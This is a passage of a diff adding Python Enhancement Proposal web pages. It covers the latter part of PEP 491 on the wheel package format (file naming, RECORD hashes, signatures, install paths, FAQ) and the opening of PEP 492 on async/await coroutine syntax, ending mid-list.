    3. Move each subtree of distribution-1.0.data/ onto its +destination path. Each subdirectory of distribution-1.0.data/ +is a key into a dict of destination directories, such as +distribution-1.0.data/(purelib|platlib|headers|scripts|data).
    4. +
    5. Update scripts starting with #!python to point to the correct +interpreter. (Note: Python scripts are usually handled by package +metadata, and not included verbatim in wheel.)
    6. +
    7. Update distribution-1.0.dist.info/RECORD with the installed +paths.
    8. +
    9. If empty, remove the distribution-1.0.data directory.
    10. +
    11. Compile any installed .py to .pyc. (Uninstallers should be smart +enough to remove .pyc even if it is not mentioned in RECORD.)
    12. +
    +
  • +
+

In practice, installers will usually extract files directly from the archive +to their destinations without writing a temporary distribution-1.0.data/ +directory.

+ + +
+
+

File Format

+
+

File name convention

+

The wheel filename is {distribution}-{version}(-{build +tag})?-{python tag}-{abi tag}-{platform tag}.whl.

+
+
distribution
Distribution name, e.g. ‘django’, ‘pyramid’.
+
version
Distribution version, e.g. 1.0.
+
build tag
Optional build number. Must start with a digit. A tie breaker +if two wheels have the same version. Sort as the empty string +if unspecified, else sort the initial digits as a number, and the +remainder lexicographically.
+
language implementation and version tag
E.g. ‘py27’, ‘py2’, ‘py3’.
+
abi tag
E.g. ‘cp33m’, ‘abi3’, ‘none’.
+
platform tag
E.g. ‘linux_x86_64’, ‘any’.
+
+

For example, distribution-1.0-1-py27-none-any.whl is the first +build of a package called ‘distribution’, and is compatible with +Python 2.7 (any Python 2.7 implementation), with no ABI (pure Python), +on any CPU architecture.

+

The last three components of the filename before the extension are +called “compatibility tags.” The compatibility tags express the +package’s basic interpreter requirements and are detailed in PEP 425.

+
+
+

Escaping and Unicode

+

Each component of the filename is escaped by replacing runs of +non-alphanumeric characters with an underscore _:

+
re.sub("[^\w\d.]+", "_", distribution, re.UNICODE)
+
+
+

The archive filename is Unicode. The packaging tools may only support +ASCII package names, but Unicode filenames are supported in this +specification.

+

The filenames inside the archive are encoded as UTF-8. Although some +ZIP clients in common use do not properly display UTF-8 filenames, +the encoding is supported by both the ZIP specification and Python’s +zipfile.

+
+
+

File contents

+

The contents of a wheel file, where {distribution} is replaced with the +name of the package, e.g. beaglevote and {version} is replaced with +its version, e.g. 1.0.0, consist of:

+
    +
  1. /, the root of the archive, contains all files to be installed in +purelib or platlib as specified in WHEEL. purelib and +platlib are usually both site-packages.
  2. +
  3. {distribution}-{version}.dist-info/ contains metadata.
  4. +
  5. {distribution}-{version}.data/ contains one subdirectory +for each non-empty install scheme key not already covered, where +the subdirectory name is an index into a dictionary of install paths +(e.g. data, scripts, include, purelib, platlib).
  6. +
  7. Python scripts must appear in scripts and begin with exactly +b'#!python' in order to enjoy script wrapper generation and +#!python rewriting at install time. They may have any or no +extension.
  8. +
  9. {distribution}-{version}.dist-info/METADATA is Metadata version 1.1 +or greater format metadata.
  10. +
  11. {distribution}-{version}.dist-info/WHEEL is metadata about the archive +itself in the same basic key: value format:
    Wheel-Version: 1.9
    +Generator: bdist_wheel 1.9
    +Root-Is-Purelib: true
    +Tag: py2-none-any
    +Tag: py3-none-any
    +Build: 1
    +Install-Paths-To: wheel/_paths.py
    +Install-Paths-To: wheel/_paths.json
    +
    +
    +
  12. +
  13. Wheel-Version is the version number of the Wheel specification.
  14. +
  15. Generator is the name and optionally the version of the software +that produced the archive.
  16. +
  17. Root-Is-Purelib is true if the top level directory of the archive +should be installed into purelib; otherwise the root should be installed +into platlib.
  18. +
  19. Tag is the wheel’s expanded compatibility tags; in the example the +filename would contain py2.py3-none-any.
  20. +
  21. Build is the build number and is omitted if there is no build number.
  22. +
  23. Install-Paths-To is a location relative to the archive that will be +overwritten with the install-time paths of each category in the install +scheme. See the install paths section. May appear 0 or more times.
  24. +
  25. A wheel installer should warn if Wheel-Version is greater than the +version it supports, and must fail if Wheel-Version has a greater +major version than the version it supports.
  26. +
  27. Wheel, being an installation format that is intended to work across +multiple versions of Python, does not generally include .pyc files.
  28. +
  29. Wheel does not contain setup.py or setup.cfg.
  30. +
+
+
The .dist-info directory
+
    +
  1. Wheel .dist-info directories include at a minimum METADATA, WHEEL, +and RECORD.
  2. +
  3. METADATA is the package metadata, the same format as PKG-INFO as +found at the root of sdists.
  4. +
  5. WHEEL is the wheel metadata specific to a build of the package.
  6. +
  7. RECORD is a list of (almost) all the files in the wheel and their +secure hashes. Unlike PEP 376, every file except RECORD, which +cannot contain a hash of itself, must include its hash. The hash +algorithm must be sha256 or better; specifically, md5 and sha1 are +not permitted, as signed wheel files rely on the strong hashes in +RECORD to validate the integrity of the archive.
  8. +
  9. PEP 376’s INSTALLER and REQUESTED are not included in the archive.
  10. +
  11. RECORD.jws is used for digital signatures. It is not mentioned in +RECORD.
  12. +
  13. RECORD.p7s is allowed as a courtesy to anyone who would prefer to +use S/MIME signatures to secure their wheel files. It is not +mentioned in RECORD.
  14. +
  15. During extraction, wheel installers verify all the hashes in RECORD +against the file contents. Apart from RECORD and its signatures, +installation will fail if any file in the archive is not both +mentioned and correctly hashed in RECORD.
  16. +
+
+
+
The .data directory
+

Any file that is not normally installed inside site-packages goes into +the .data directory, named as the .dist-info directory but with the +.data/ extension:

+
distribution-1.0.dist-info/
+
+distribution-1.0.data/
+
+
+

The .data directory contains subdirectories with the scripts, headers, +documentation and so forth from the distribution. During installation the +contents of these subdirectories are moved onto their destination paths.

+

If a subdirectory is not found in the install scheme, the installer should +emit a warning, and it should be installed at distribution-1.0.data/... +as if the package was unpacked by a standard unzip tool.

+
+
+
Install paths
+

In addition to the distutils install paths, wheel now includes the listed +categories based on GNU autotools. This expanded scheme should help installers +to implement system policy, but installers may root each category at any +location.

+

A UNIX install scheme might map the categories to their installation paths +like this:

+
{
+    'bindir': '$eprefix/bin',
+    'sbindir': '$eprefix/sbin',
+    'libexecdir': '$eprefix/libexec',
+    'sysconfdir': '$prefix/etc',
+    'sharedstatedir': '$prefix/com',
+    'localstatedir': '$prefix/var',
+    'libdir': '$eprefix/lib',
+    'static_libdir': r'$prefix/lib',
+    'includedir': '$prefix/include',
+    'datarootdir': '$prefix/share',
+    'datadir': '$datarootdir',
+    'mandir': '$datarootdir/man',
+    'infodir': '$datarootdir/info',
+    'localedir': '$datarootdir/locale',
+    'docdir': '$datarootdir/doc/$dist_name',
+    'htmldir': '$docdir',
+    'dvidir': '$docdir',
+    'psdir': '$docdir',
+    'pdfdir': '$docdir',
+    'pkgdatadir': '$datadir/$dist_name'
+}
+
+
+

If a package needs to find its files at runtime, it can request +they be written to a specified file or files by the installer and +included in those same files inside the archive itself, relative +to their location within the archive (so a wheel is still installed +correctly if unpacked with a standard unzip tool, or perhaps not +unpacked at all).

+

If the WHEEL metadata contains these fields:

+
Install-Paths-To: wheel/_paths.py
+Install-Paths-To: wheel/_paths.json
+
+
+

Then the wheel installer, when it is about to unpack wheel/_paths.py from +the archive, replaces it with the actual paths used at install time. The +paths may be absolute or relative to the generated file.

+

If the filename ends with .py then a Python script is written. The +script MUST be executed to get the paths, but it will probably look like +this:

+
data='../wheel-0.26.0.dev1.data/data'
+headers='../wheel-0.26.0.dev1.data/headers'
+platlib='../wheel-0.26.0.dev1.data/platlib'
+purelib='../wheel-0.26.0.dev1.data/purelib'
+scripts='../wheel-0.26.0.dev1.data/scripts'
+# ...
+
+
+

If the filename ends with .json then a JSON document is written:

+
{ "data": "../wheel-0.26.0.dev1.data/data", ... }
+
+
+

Only the categories actually used by a particular wheel must be written to +this file.

+

These files are designed to be written to a location that can be found by the +installed package without introducing any dependency on a packaging library.

+
+
+
+
+

Signed wheel files

+

Wheel files include an extended RECORD that enables digital +signatures. PEP 376’s RECORD is altered to include a secure hash +digestname=urlsafe_b64encode_nopad(digest) (urlsafe base64 +encoding with no trailing = characters) as the second column instead +of an md5sum. All possible entries are hashed, including any +generated files such as .pyc files, but not RECORD which cannot contain its +own hash. For example:

+
file.py,sha256=AVTFPZpEKzuHr7OvQZmhaU3LvwKz06AJw8mT\_pNh2yI,3144
+distribution-1.0.dist-info/RECORD,,
+
+
+

The signature file(s) RECORD.jws and RECORD.p7s are not mentioned in +RECORD at all since they can only be added after RECORD is generated. +Every other file in the archive must have a correct hash in RECORD +or the installation will fail.

+

If JSON web signatures are used, one or more JSON Web Signature JSON +Serialization (JWS-JS) signatures is stored in a file RECORD.jws adjacent +to RECORD. JWS is used to sign RECORD by including the SHA-256 hash of +RECORD as the signature’s JSON payload:

+
{ "hash": "sha256=ADD-r2urObZHcxBW3Cr-vDCu5RJwT4CaRTHiFmbcIYY" }
+
+
+

(The hash value is the same format used in RECORD.)

+

If RECORD.p7s is used, it must contain a detached S/MIME format signature +of RECORD.

+

A wheel installer is not required to understand digital signatures but +MUST verify the hashes in RECORD against the extracted file contents. +When the installer checks file hashes against RECORD, a separate signature +checker only needs to establish that RECORD matches the signature.

+

See

+ +
+
+

Comparison to .egg

+
    +
  1. Wheel is an installation format; egg is importable. Wheel archives +do not need to include .pyc and are less tied to a specific Python +version or implementation. Wheel can install (pure Python) packages +built with previous versions of Python so you don’t always have to +wait for the packager to catch up.
  2. +
  3. Wheel uses .dist-info directories; egg uses .egg-info. Wheel is +compatible with the new world of Python packaging and the new +concepts it brings.
  4. +
  5. Wheel has a richer file naming convention for today’s +multi-implementation world. A single wheel archive can indicate +its compatibility with a number of Python language versions and +implementations, ABIs, and system architectures. Historically the +ABI has been specific to a CPython release, wheel is ready for the +stable ABI.
  6. +
  7. Wheel is lossless. The first wheel implementation bdist_wheel +always generates egg-info, and then converts it to a .whl. It is +also possible to convert existing eggs and bdist_wininst +distributions.
  8. +
  9. Wheel is versioned. Every wheel file contains the version of the +wheel specification and the implementation that packaged it. +Hopefully the next migration can simply be to Wheel 2.0.
  10. +
  11. Wheel is a reference to the other Python.
  12. +
+
+
+
+

FAQ

+
+

Wheel defines a .data directory. Should I put all my data there?

+
+
This specification does not have an opinion on how you should organize +your code. The .data directory is just a place for any files that are +not normally installed inside site-packages or on the PYTHONPATH. +In other words, you may continue to use pkgutil.get_data(package, +resource) even though those files will usually not be distributed +in wheel’s .data directory.
+
+
+

Why does wheel include attached signatures?

+
+
Attached signatures are more convenient than detached signatures +because they travel with the archive. Since only the individual files +are signed, the archive can be recompressed without invalidating +the signature or individual files can be verified without having +to download the whole archive.
+
+
+

Why does wheel allow JWS signatures?

+
+
The JOSE specifications of which JWS is a part are designed to be easy +to implement, a feature that is also one of wheel’s primary design +goals. JWS yields a useful, concise pure-Python implementation.
+
+
+

Why does wheel also allow S/MIME signatures?

+
+
S/MIME signatures are allowed for users who need or want to use +existing public key infrastructure with wheel.

Signed packages are only a basic building block in a secure package +update system. Wheel only provides the building block.

+
+
+
+

What’s the deal with “purelib” vs. “platlib”?

+
+
Wheel preserves the “purelib” vs. “platlib” distinction, which is +significant on some platforms. For example, Fedora installs pure +Python packages to ‘/usr/lib/pythonX.Y/site-packages’ and platform +dependent packages to ‘/usr/lib64/pythonX.Y/site-packages’.

A wheel with “Root-Is-Purelib: false” with all its files +in {name}-{version}.data/purelib is equivalent to a wheel with +“Root-Is-Purelib: true” with those same files in the root, and it +is legal to have files in both the “purelib” and “platlib” categories.

+

In practice a wheel should have only one of “purelib” or “platlib” +depending on whether it is pure Python or not and those files should +be at the root with the appropriate setting given for “Root-is-purelib”.

+
+
+
+

Is it possible to import Python code directly from a wheel file?

+
+
Technically, due to the combination of supporting installation via +simple extraction and using an archive format that is compatible with +zipimport, a subset of wheel files do support being placed directly +on sys.path. However, while this behaviour is a natural consequence +of the format design, actually relying on it is generally discouraged.

Firstly, wheel is designed primarily as a distribution format, so +skipping the installation step also means deliberately avoiding any +reliance on features that assume full installation (such as being able +to use standard tools like pip and virtualenv to capture and +manage dependencies in a way that can be properly tracked for auditing +and security update purposes, or integrating fully with the standard +build machinery for C extensions by publishing header files in the +appropriate place).

+

Secondly, while some Python software is written to support running +directly from a zip archive, it is still common for code to be written +assuming it has been fully installed. When that assumption is broken +by trying to run the software from a zip archive, the failures can often +be obscure and hard to diagnose (especially when they occur in third +party libraries). The two most common sources of problems with this +are the fact that importing C extensions from a zip archive is not +supported by CPython (since doing so is not supported directly by the +dynamic loading machinery on any platform) and that when running from +a zip archive the __file__ attribute no longer refers to an +ordinary filesystem path, but to a combination path that includes +both the location of the zip archive on the filesystem and the +relative path to the module inside the archive. Even when software +correctly uses the abstract resource APIs internally, interfacing with +external components may still require the availability of an actual +on-disk file.

+

Like metaclasses, monkeypatching and metapath importers, if you’re not +already sure you need to take advantage of this feature, you almost +certainly don’t need it. If you do decide to use it anyway, be +aware that many projects will require a failure to be reproduced with +a fully installed package before accepting it as a genuine bug.

+
+
+
+
+

Appendix

+

Example urlsafe-base64-nopad implementation:

+
# urlsafe-base64-nopad for Python 3
+import base64
+
+def urlsafe_b64encode_nopad(data):
+    return base64.urlsafe_b64encode(data).rstrip(b'=')
+
+def urlsafe_b64decode_nopad(data):
+    pad = b'=' * (4 - (len(data) & 3))
+    return base64.urlsafe_b64decode(data + pad)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0491.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0492/index.html b/pep-0492/index.html new file mode 100644 index 00000000000..2bf499a2fd6 --- /dev/null +++ b/pep-0492/index.html @@ -0,0 +1,1588 @@ + + + + + + + + PEP 492 – Coroutines with async and await syntax | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 492 – Coroutines with async and await syntax

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Apr-2015
+
Python-Version:
+
3.5
+
Post-History:
+
17-Apr-2015, 21-Apr-2015, 27-Apr-2015, 29-Apr-2015, 05-May-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

The growth of Internet and general connectivity has triggered the +proportionate need for responsive and scalable code. This proposal +aims to answer that need by making writing explicitly asynchronous, +concurrent Python code easier and more Pythonic.

+

It is proposed to make coroutines a proper standalone concept in +Python, and introduce new supporting syntax. The ultimate goal +is to help establish a common, easily approachable, mental +model of asynchronous programming in Python and make it as close to +synchronous programming as possible.

+

This PEP assumes that the asynchronous tasks are scheduled and +coordinated by an Event Loop similar to that of stdlib module +asyncio.events.AbstractEventLoop. While the PEP is not tied to any +specific Event Loop implementation, it is relevant only to the kind of +coroutine that uses yield as a signal to the scheduler, indicating +that the coroutine will be waiting until an event (such as IO) is +completed.

+

We believe that the changes proposed here will help keep Python +relevant and competitive in a quickly growing area of asynchronous +programming, as many other languages have adopted, or are planning to +adopt, similar features: [2], [5], [6], [7], [8], [10].

+
+
+

API Design and Implementation Revisions

+
    +
  1. Feedback on the initial beta release of Python 3.5 resulted in a +redesign of the object model supporting this PEP to more clearly +separate native coroutines from generators - rather than being a +new kind of generator, native coroutines are now their own +completely distinct type (implemented in [17]).

    This change was implemented based primarily due to problems +encountered attempting to integrate support for native coroutines +into the Tornado web server (reported in [18]).

    +
  2. +
  3. In CPython 3.5.2, the __aiter__ protocol was updated.

    Before 3.5.2, __aiter__ was expected to return an awaitable +resolving to an asynchronous iterator. Starting with 3.5.2, +__aiter__ should return asynchronous iterators directly.

    +

    If the old protocol is used in 3.5.2, Python will raise a +PendingDeprecationWarning.

    +

    In CPython 3.6, the old __aiter__ protocol will still be +supported with a DeprecationWarning being raised.

    +

    In CPython 3.7, the old __aiter__ protocol will no longer be +supported: a RuntimeError will be raised if __aiter__ +returns anything but an asynchronous iterator.

    +

    See [19] and [20] for more details.

    +
  4. +
+
+
+

Rationale and Goals

+

Current Python supports implementing coroutines via generators (PEP +342), further enhanced by the yield from syntax introduced in PEP +380. This approach has a number of shortcomings:

+
    +
  • It is easy to confuse coroutines with regular generators, since they +share the same syntax; this is especially true for new developers.
  • +
  • Whether or not a function is a coroutine is determined by a presence +of yield or yield from statements in its body, which can +lead to unobvious errors when such statements appear in or disappear +from function body during refactoring.
  • +
  • Support for asynchronous calls is limited to expressions where +yield is allowed syntactically, limiting the usefulness of +syntactic features, such as with and for statements.
  • +
+

This proposal makes coroutines a native Python language feature, and +clearly separates them from generators. This removes +generator/coroutine ambiguity, and makes it possible to reliably define +coroutines without reliance on a specific library. This also enables +linters and IDEs to improve static code analysis and refactoring.

+

Native coroutines and the associated new syntax features make it +possible to define context manager and iteration protocols in +asynchronous terms. As shown later in this proposal, the new async +with statement lets Python programs perform asynchronous calls when +entering and exiting a runtime context, and the new async for +statement makes it possible to perform asynchronous calls in iterators.

+
+
+

Specification

+

This proposal introduces new syntax and semantics to enhance coroutine +support in Python.

+

This specification presumes knowledge of the implementation of +coroutines in Python (PEP 342 and PEP 380). Motivation for the syntax +changes proposed here comes from the asyncio framework (PEP 3156) and +the “Cofunctions” proposal (PEP 3152, now rejected in favor of this +specification).

+

From this point in this document we use the word native coroutine to +refer to functions declared using the new syntax. generator-based +coroutine is used where necessary to refer to coroutines that are +based on generator syntax. coroutine is used in contexts where both +definitions are applicable.

+
+

New Coroutine Declaration Syntax

+

The following new syntax is used to declare a native coroutine:

+
async def read_data(db):
+    pass
+
+
+

Key properties of coroutines:

+
    +
  • async def functions are always coroutines, even if they do not +contain await expressions.
  • +
  • It is a SyntaxError to have yield or yield from +expressions in an async function.
  • +
  • Internally, two new code object flags were introduced:
      +
    • CO_COROUTINE is used to mark native coroutines +(defined with new syntax).
    • +
    • CO_ITERABLE_COROUTINE is used to make generator-based +coroutines compatible with native coroutines (set by +types.coroutine() function).
    • +
    +
  • +
  • Regular generators, when called, return a generator object; +similarly, coroutines return a coroutine object.
  • +
  • StopIteration exceptions are not propagated out of coroutines, +and are replaced with a RuntimeError. For regular generators +such behavior requires a future import (see PEP 479).
  • +
  • When a native coroutine is garbage collected, a RuntimeWarning +is raised if it was never awaited on (see also +Debugging Features).
  • +
  • See also Coroutine objects section.
  • +
+
+
+

types.coroutine()

+

A new function coroutine(fn) is added to the types module. It +allows interoperability between existing generator-based coroutines +in asyncio and native coroutines introduced by this PEP:

+
@types.coroutine
+def process_data(db):
+    data = yield from read_data(db)
+    ...
+
+
+

The function applies CO_ITERABLE_COROUTINE flag to +generator-function’s code object, making it return a coroutine object.

+

If fn is not a generator function, it is wrapped. If it returns +a generator, it will be wrapped in an awaitable proxy object +(see below the definition of awaitable objects).

+

Note, that the CO_COROUTINE flag is not applied by +types.coroutine() to make it possible to separate native +coroutines defined with new syntax, from generator-based coroutines.

+
+
+

Await Expression

+

The following new await expression is used to obtain a result of +coroutine execution:

+
async def read_data(db):
+    data = await db.fetch('SELECT ...')
+    ...
+
+
+

await, similarly to yield from, suspends execution of +read_data coroutine until db.fetch awaitable completes and +returns the result data.

+

It uses the yield from implementation with an extra step of +validating its argument. await only accepts an awaitable, which +can be one of:

+
    +
  • A native coroutine object returned from a native coroutine +function.
  • +
  • A generator-based coroutine object returned from a function +decorated with types.coroutine().
  • +
  • An object with an __await__ method returning an iterator.

    Any yield from chain of calls ends with a yield. This is a +fundamental mechanism of how Futures are implemented. Since, +internally, coroutines are a special kind of generators, every +await is suspended by a yield somewhere down the chain of +await calls (please refer to PEP 3156 for a detailed +explanation).

    +

    To enable this behavior for coroutines, a new magic method called +__await__ is added. In asyncio, for instance, to enable Future +objects in await statements, the only change is to add +__await__ = __iter__ line to asyncio.Future class.

    +

    Objects with __await__ method are called Future-like objects in +the rest of this PEP.

    +

    It is a TypeError if __await__ returns anything but an +iterator.

    +
  • +
  • Objects defined with CPython C API with a tp_as_async.am_await +function, returning an iterator (similar to __await__ method).
  • +
+

It is a SyntaxError to use await outside of an async def +function (like it is a SyntaxError to use yield outside of +def function).

+

It is a TypeError to pass anything other than an awaitable object +to an await expression.

+
+

Updated operator precedence table

+

await keyword is defined as follows:

+
power ::=  await ["**" u_expr]
+await ::=  ["await"] primary
+
+
+

where “primary” represents the most tightly bound operations of the +language. Its syntax is:

+
primary ::=  atom | attributeref | subscription | slicing | call
+
+
+

See Python Documentation [12] and Grammar Updates section of this +proposal for details.

+

The key await difference from yield and yield from +operators is that await expressions do not require parentheses around +them most of the times.

+

Also, yield from allows any expression as its argument, including +expressions like yield from a() + b(), that would be parsed as +yield from (a() + b()), which is almost always a bug. In general, +the result of any arithmetic operation is not an awaitable object. +To avoid this kind of mistakes, it was decided to make await +precedence lower than [], (), and ., but higher than ** +operators.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OperatorDescription
yield x, +yield from xYield expression
lambdaLambda expression
ifelseConditional expression
orBoolean OR
andBoolean AND
not xBoolean NOT
in, not in, +is, is not, <, +<=, >, >=, +!=, ==Comparisons, including membership +tests and identity tests
|Bitwise OR
^Bitwise XOR
&Bitwise AND
<<, >>Shifts
+, -Addition and subtraction
*, @, /, //, +%Multiplication, matrix +multiplication, division, +remainder
+x, -x, ~xPositive, negative, bitwise NOT
**Exponentiation
await xAwait expression
x[index], +x[index:index], +x(arguments...), +x.attributeSubscription, slicing, +call, attribute reference
(expressions...), +[expressions...], +{key: value...}, +{expressions...}Binding or tuple display, +list display, +dictionary display, +set display
+
+
+

Examples of “await” expressions

+

Valid syntax examples:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
ExpressionWill be parsed as
if await fut: passif (await fut): pass
if await fut + 1: passif (await fut) + 1: pass
pair = await fut, 'spam'pair = (await fut), 'spam'
with await fut, open(): passwith (await fut), open(): pass
await foo()['spam'].baz()()await ( foo()['spam'].baz()() )
return await coro()return ( await coro() )
res = await coro() ** 2res = (await coro()) ** 2
func(a1=await coro(), a2=0)func(a1=(await coro()), a2=0)
await foo() + await bar()(await foo()) + (await bar())
-await foo()-(await foo())
+

Invalid syntax examples:

+ + + + + + + + + + + + + + +
ExpressionShould be written as
await await coro()await (await coro())
await -coro()await (-coro())
+
+
+
+

Asynchronous Context Managers and “async with”

+

An asynchronous context manager is a context manager that is able to +suspend execution in its enter and exit methods.

+

To make this possible, a new protocol for asynchronous context managers +is proposed. Two new magic methods are added: __aenter__ and +__aexit__. Both must return an awaitable.

+

An example of an asynchronous context manager:

+
class AsyncContextManager:
+    async def __aenter__(self):
+        await log('entering context')
+
+    async def __aexit__(self, exc_type, exc, tb):
+        await log('exiting context')
+
+
+
+

New Syntax

+

A new statement for asynchronous context managers is proposed:

+
async with EXPR as VAR:
+    BLOCK
+
+
+

which is semantically equivalent to:

+
mgr = (EXPR)
+aexit = type(mgr).__aexit__
+aenter = type(mgr).__aenter__
+
+VAR = await aenter(mgr)
+try:
+    BLOCK
+except:
+    if not await aexit(mgr, *sys.exc_info()):
+        raise
+else:
+    await aexit(mgr, None, None, None)
+
+
+

As with regular with statements, it is possible to specify multiple +context managers in a single async with statement.

+

It is an error to pass a regular context manager without __aenter__ +and __aexit__ methods to async with. It is a SyntaxError +to use async with outside of an async def function.

+
+
+

Example

+

With asynchronous context managers it is easy to implement proper +database transaction managers for coroutines:

+
async def commit(session, data):
+    ...
+
+    async with session.transaction():
+        ...
+        await session.update(data)
+        ...
+
+
+

Code that needs locking also looks lighter:

+
async with lock:
+    ...
+
+
+

instead of:

+
with (yield from lock):
+    ...
+
+
+
+
+
+

Asynchronous Iterators and “async for”

+

An asynchronous iterable is able to call asynchronous code in its +iter implementation, and asynchronous iterator can call +asynchronous code in its next method. To support asynchronous +iteration:

+
    +
  1. An object must implement an __aiter__ method (or, if defined +with CPython C API, tp_as_async.am_aiter slot) returning an +asynchronous iterator object.
  2. +
  3. An asynchronous iterator object must implement an __anext__ +method (or, if defined with CPython C API, tp_as_async.am_anext +slot) returning an awaitable.
  4. +
  5. To stop iteration __anext__ must raise a StopAsyncIteration +exception.
  6. +
+

An example of asynchronous iterable:

+
class AsyncIterable:
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        data = await self.fetch_data()
+        if data:
+            return data
+        else:
+            raise StopAsyncIteration
+
+    async def fetch_data(self):
+        ...
+
+
+
+

New Syntax

+

A new statement for iterating through asynchronous iterators is +proposed:

+
async for TARGET in ITER:
+    BLOCK
+else:
+    BLOCK2
+
+
+

which is semantically equivalent to:

+
iter = (ITER)
+iter = type(iter).__aiter__(iter)
+running = True
+while running:
+    try:
+        TARGET = await type(iter).__anext__(iter)
+    except StopAsyncIteration:
+        running = False
+    else:
+        BLOCK
+else:
+    BLOCK2
+
+
+

It is a TypeError to pass a regular iterable without __aiter__ +method to async for. It is a SyntaxError to use async for +outside of an async def function.

+

As for with regular for statement, async for has an optional +else clause.

+
+
+

Example 1

+

With asynchronous iteration protocol it is possible to asynchronously +buffer data during iteration:

+
async for data in cursor:
+    ...
+
+
+

Where cursor is an asynchronous iterator that prefetches N rows +of data from a database after every N iterations.

+

The following code illustrates new asynchronous iteration protocol:

+
class Cursor:
+    def __init__(self):
+        self.buffer = collections.deque()
+
+    async def _prefetch(self):
+        ...
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        if not self.buffer:
+            self.buffer = await self._prefetch()
+            if not self.buffer:
+                raise StopAsyncIteration
+        return self.buffer.popleft()
+
+
+

then the Cursor class can be used as follows:

+
async for row in Cursor():
+    print(row)
+
+
+

which would be equivalent to the following code:

+
i = Cursor().__aiter__()
+while True:
+    try:
+        row = await i.__anext__()
+    except StopAsyncIteration:
+        break
+    else:
+        print(row)
+
+
+
+
+

Example 2

+

The following is a utility class that transforms a regular iterable to +an asynchronous one. While this is not a very useful thing to do, the +code illustrates the relationship between regular and asynchronous +iterators.

+
class AsyncIteratorWrapper:
+    def __init__(self, obj):
+        self._it = iter(obj)
+
+    def __aiter__(self):
+        return self
+
+    async def __anext__(self):
+        try:
+            value = next(self._it)
+        except StopIteration:
+            raise StopAsyncIteration
+        return value
+
+async for letter in AsyncIteratorWrapper("abc"):
+    print(letter)
+
+
+
+
+

Why StopAsyncIteration?

+

Coroutines are still based on generators internally. So, before PEP +479, there was no fundamental difference between

+
def g1():
+    yield from fut
+    return 'spam'
+
+
+

and

+
def g2():
+    yield from fut
+    raise StopIteration('spam')
+
+
+

And since PEP 479 is accepted and enabled by default for coroutines, +the following example will have its StopIteration wrapped into a +RuntimeError

+
async def a1():
+    await fut
+    raise StopIteration('spam')
+
+
+

The only way to tell the outside code that the iteration has ended is +to raise something other than StopIteration. Therefore, a new +built-in exception class StopAsyncIteration was added.

+

Moreover, with semantics from PEP 479, all StopIteration exceptions +raised in coroutines are wrapped in RuntimeError.

+
+
+
+

Coroutine objects

+
+

Differences from generators

+

This section applies only to native coroutines with CO_COROUTINE +flag, i.e. defined with the new async def syntax.

+

The behavior of existing *generator-based coroutines* in asyncio +remains unchanged.

+

Great effort has been made to make sure that coroutines and +generators are treated as distinct concepts:

+
    +
  1. Native coroutine objects do not implement __iter__ and +__next__ methods. Therefore, they cannot be iterated over or +passed to iter(), list(), tuple() and other built-ins. +They also cannot be used in a for..in loop.

    An attempt to use __iter__ or __next__ on a native +coroutine object will result in a TypeError.

    +
  2. +
  3. Plain generators cannot yield from native coroutines: +doing so will result in a TypeError.
  4. +
  5. generator-based coroutines (for asyncio code must be decorated +with @asyncio.coroutine [1]) can yield from native coroutine +objects.
  6. +
  7. inspect.isgenerator() and inspect.isgeneratorfunction() +return False for native coroutine objects and native +coroutine functions.
  8. +
+
+
+

Coroutine object methods

+

Coroutines are based on generators internally, thus they share the +implementation. Similarly to generator objects, coroutines have +throw(), send() and close() methods. StopIteration and +GeneratorExit play the same role for coroutines (although +PEP 479 is enabled by default for coroutines). See PEP 342, PEP 380, +and Python Documentation [11] for details.

+

throw(), send() methods for coroutines are used to push +values and raise errors into Future-like objects.

+
+
+
+

Debugging Features

+

A common beginner mistake is forgetting to use yield from on +coroutines:

+
@asyncio.coroutine
+def useful():
+    asyncio.sleep(1) # this will do nothing without 'yield from'
+
+
+

For debugging this kind of mistakes there is a special debug mode in +asyncio, in which @coroutine decorator wraps all functions with a +special object with a destructor logging a warning. Whenever a wrapped +generator gets garbage collected, a detailed logging message is +generated with information about where exactly the decorator function +was defined, stack trace of where it was collected, etc. Wrapper +object also provides a convenient __repr__ function with detailed +information about the generator.

+

The only problem is how to enable these debug capabilities. Since +debug facilities should be a no-op in production mode, @coroutine +decorator makes the decision of whether to wrap or not to wrap based on +an OS environment variable PYTHONASYNCIODEBUG. This way it is +possible to run asyncio programs with asyncio’s own functions +instrumented. EventLoop.set_debug, a different debug facility, has +no impact on @coroutine decorator’s behavior.

+

With this proposal, coroutines is a native, distinct from generators, +concept. In addition to a RuntimeWarning being raised on +coroutines that were never awaited, it is proposed to add two new +functions to the sys module: set_coroutine_wrapper and +get_coroutine_wrapper. This is to enable advanced debugging +facilities in asyncio and other frameworks (such as displaying where +exactly coroutine was created, and a more detailed stack trace of where +it was garbage collected).

+
+
+

New Standard Library Functions

+
    +
  • types.coroutine(gen). See types.coroutine() section for +details.
  • +
  • inspect.iscoroutine(obj) returns True if obj is a +native coroutine object.
  • +
  • inspect.iscoroutinefunction(obj) returns True if obj is a +native coroutine function.
  • +
  • inspect.isawaitable(obj) returns True if obj is an +awaitable.
  • +
  • inspect.getcoroutinestate(coro) returns the current state of +a native coroutine object (mirrors +inspect.getfgeneratorstate(gen)).
  • +
  • inspect.getcoroutinelocals(coro) returns the mapping of a +native coroutine object’s local variables to their values +(mirrors inspect.getgeneratorlocals(gen)).
  • +
  • sys.set_coroutine_wrapper(wrapper) allows to intercept creation of +native coroutine objects. wrapper must be either a callable that +accepts one argument (a coroutine object), or None. None +resets the wrapper. If called twice, the new wrapper replaces the +previous one. The function is thread-specific. See Debugging +Features for more details.
  • +
